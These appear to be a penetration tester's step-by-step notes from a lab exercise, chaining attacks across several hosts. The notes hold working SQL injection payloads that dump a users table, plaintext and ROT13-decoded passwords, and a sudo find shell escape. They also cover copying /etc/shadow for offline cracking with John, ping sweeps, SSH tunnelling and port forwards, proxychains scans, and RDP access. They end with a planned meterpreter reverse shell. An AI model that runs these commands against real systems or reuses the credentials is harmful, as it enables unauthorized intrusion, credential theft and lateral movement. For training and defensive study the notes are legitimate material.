first target  (no jump box)
ANSO-503-M
10.50.27.161


nmap 
Starting Nmap 7.60 ( https://nmap.org ) at 2024-07-26 13:38 UTC
Nmap scan report for 10.50.27.161
Host is up (0.0045s latency).
Not shown: 998 filtered ports
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
| http-enum: 
|   /login.php: Possible admin folder
|   /login.html: Possible admin folder
|   /img/: Potentially interesting directory w/ listing on 'apache/2.4.29 (ubuntu)'
|_  /scripts/: Potentially interesting directory w/ listing on 'apache/2.4.29 (ubuntu)'



10.50.27.161 SQL INJECTION


file to read
/etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
lxd:x:105:65534::/var/lib/lxd/:/bin/false
uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin
dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
landscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin
sshd:x:109:65534::/run/sshd:/usr/sbin/nologin
pollinate:x:110:1::/var/cache/pollinate:/bin/false
ubuntu:x:1000:1000:Ubuntu:/home/ubuntu:/bin/bash
mysql:x:111:115:MySQL Server,,,:/nonexistent:/bin/false
user2:x:1001:1001::/home/user2:/bin/sh

document found development.py
  1 #!/usr/bin/python3
  2 
  3 import os
  4 
  5 system_user=user2
  6 user_password=EaglesIsARE78
  7 
  8 
  9 
 10 ##Developer note
 11 
 12 #script will eventually take above system user credentials and run automated     services

ssh to .161

bash

cat /etc/hosts
# The following lines are desirable for IPv6 capable hosts
::1 ip6-localhost ip6-loopback
fe00::0 ip6-localnet
ff00::0 ip6-mcastprefix
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
ff02::3 ip6-allhosts
192.168.28.181 WebApp

run sweep on 192.168.28.0/24

for i in {1..254} ;do (ping -c 1 192.168.28.$i | grep "bytes from" &) ;done
64 bytes from 192.168.28.172: icmp_seq=1 ttl=63 time=0.793 ms
64 bytes from 192.168.28.181: icmp_seq=1 ttl=63 time=0.373 ms
64 bytes from 192.168.28.190: icmp_seq=1 ttl=64 time=0.069 ms

scan .172 and .181
Nmap scan report for 192.168.28.172
Host is up (0.00052s latency).
Not shown: 999 closed ports
PORT   STATE SERVICE
22/tcp open  ssh

Nmap scan report for 192.168.28.181
Host is up (0.00042s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

make socket to .181 and .172

access website on .181

   WEBAPP
.181 SQL DATABSE
find vuln field
product=7 provides other than normal output when !!!!...?product= 7 OR 1=1
product=7 UNION SELECT 1,.... FOR FIELD NUMBERS
golden statement WITH A SPACE BETWEEN 7 AND UNION
fileds output-> 1 3 2

siteusers 	customer 	$id
siteusers 	customer 	$name
siteusers 	customer 	$account
siteusers 	customer 	$category
siteusers 	customer 	$description
siteusers 	net_products 	$id
siteusers 	net_products 	$quantity
siteusers 	net_products 	$product
siteusers 	net_products 	$price
siteusers 	purchase_history 	$id
siteusers 	purchase_history 	$quantity
siteusers 	purchase_history 	$product
siteusers 	purchase_history 	$account
siteusers 	shippingdates 	$id
siteusers 	shippingdates 	$ordernumber
siteusers 	shippingdates 	$account
siteusers 	shippingdates 	$date
siteusers 	users 	$user_id
siteusers 	users 	$name
siteusers 	users 	$username

http://127.0.0.1:11712/pick.php?product=7%20UNION%20SELECT%20name,user_id,username%20FROM%20%20siteusers.users%20#
Aaron 	Aaron 	$1
user2 	user2 	$2
user3 	user3 	$3
Lee_Roth 	Lroth 	$4
Aaron 	ncnffjbeqlCn$$jbeq 	$1
user2 	RntyrfVfNER78 	$2
user3 	Obo4GURRnccyrf 	$3
Lroth 	anotherpassword4THEages 	$4
  
decoded PW from ROT13
Aaron apasswordyPa$$word
user2 EaglesIsARE78
user3 Bob4THEEapples
--------------------
Lroth anotherpassword4THEages

user pass dont work on .181

trying .172
Aaron only working user:pass

.172 = ROUND SENSOR

cat /etc/hosts
127.0.0.1 localhost

# The following lines are desirable for IPv6 capable hosts
::1 ip6-localhost ip6-loopback
fe00::0 ip6-localnet
ff00::0 ip6-mcastprefix
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
ff02::3 ip6-allhosts

sudo -l 
User Aaron may run the following commands on RoundSensor:
    (ALL) NOPASSWD: /usr/bin/find

GTFO find command
sudo find . -exec /bin/sh \; -quit

made copy of /etc/shadow and scp it to linops dryrun dir

run john on file


run another sweep on 28.0

for i in {1..254} ;do (ping -c 1 192.168.28.$i | grep "bytes from" &) ;done
64 bytes from 192.168.28.172: icmp_seq=1 ttl=64 time=0.028 ms
64 bytes from 192.168.28.190: icmp_seq=1 ttl=64 time=0.359 ms
64 bytes from 192.168.28.179: icmp_seq=1 ttl=128 time=41.4 ms
64 bytes from 192.168.28.234: icmp_seq=1 ttl=64 time=0.964 ms

 make master socket on .181
ssh -MS /tmp/T2 Aaron@127.0.0.1 -p 11713

move dynamic to T2
scan .179

proxychains nmap 192.168.28.179
Nmap scan report for 192.168.28.179
Host is up (0.00074s latency).
Not shown: 994 closed ports
PORT     STATE SERVICE
22/tcp   open  ssh
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
3389/tcp open  ms-wbt-server
9999/tcp open  abyss

make socket to windows shh and rdp and 9999 port .179 
ssh -S /tmp/T2 dummy -O forward -L 11714:192.168.28.179:3389
ssh -S /tmp/T2 dummy -O forward -L 11715:192.168.28.179:9999
ssh -S /tmp/T2 dummy -O forward -L 11716:192.168.28.179:22

connect to windows box via rdp
xfreerdp /u:Lroth /v:127.0.0.1:11714 /dynamic-resolution /glyph-cache /clipboard

connect to windows box via meterpreter reverse shell with buffer overflow


























